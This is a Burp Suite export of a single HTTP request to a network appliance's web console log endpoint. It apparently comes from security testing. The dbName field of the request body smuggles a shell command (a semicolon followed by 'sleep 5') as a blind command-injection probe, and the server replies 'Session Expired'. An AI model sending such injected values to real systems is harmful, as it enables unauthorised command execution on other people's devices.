<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="2024.1.1.6" exportTime="Fri Mar 22 10:03:45 CST 2024">
  <item>
    <time>Thu Mar 21 18:18:42 CST 2024</time>
    <url><![CDATA[https://172.16.16.16:4444/webconsole/Controller]]></url>
    <host ip="172.16.16.16">172.16.16.16</host>
    <port>4444</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/webconsole/Controller]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /webconsole/Controller HTTP/1.1
Host: 172.16.16.16:4444
Cookie: JSESSIONID=vbyvfs0bfwd613s00j5kt7mew
Content-Length: 308
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
X-Csrf-Token: 7kchdt78ui3sf9pok233e3gmnq
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://172.16.16.16:4444
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://172.16.16.16:4444/webconsole/webpages/logging/EventViewer.jsp?selectedTab=log_viewer&csrf=7kchdt78ui3sf9pok233e3gmnq
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=1, i
Connection: close

mode=5001&json=%7B%22mode%22%3A5001%2C%22filter%22%3A%7B%7D%2C%22clientLimit%22%3A100%2C%22clientOffset%22%3A0%2C%22limit%22%3A100%2C%22offset%22%3A0%2C%22isLive%22%3Atrue%2C%22dbName%22%3A%22%aaa%3Bsleep%205%22%2C%22rowid%22%3A%22%22%2C%22module%22%3A%5B%22system%22%5D%7D&__RequestType=ajax&t=1710931806625]]></request>
    <status>200</status>
    <responselength>284</responselength>
    <mimetype>JSON</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 21 Mar 2024 18:18:23 GMT
Server: xxxx
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
Content-Length: 29
Cache-Control: max-age=2592000
Expires: Sat, 20 Apr 2024 18:18:23 GMT
Connection: close

{"status":"Session Expired"}
]]></response>
    <comment></comment>
  </item>
</items>
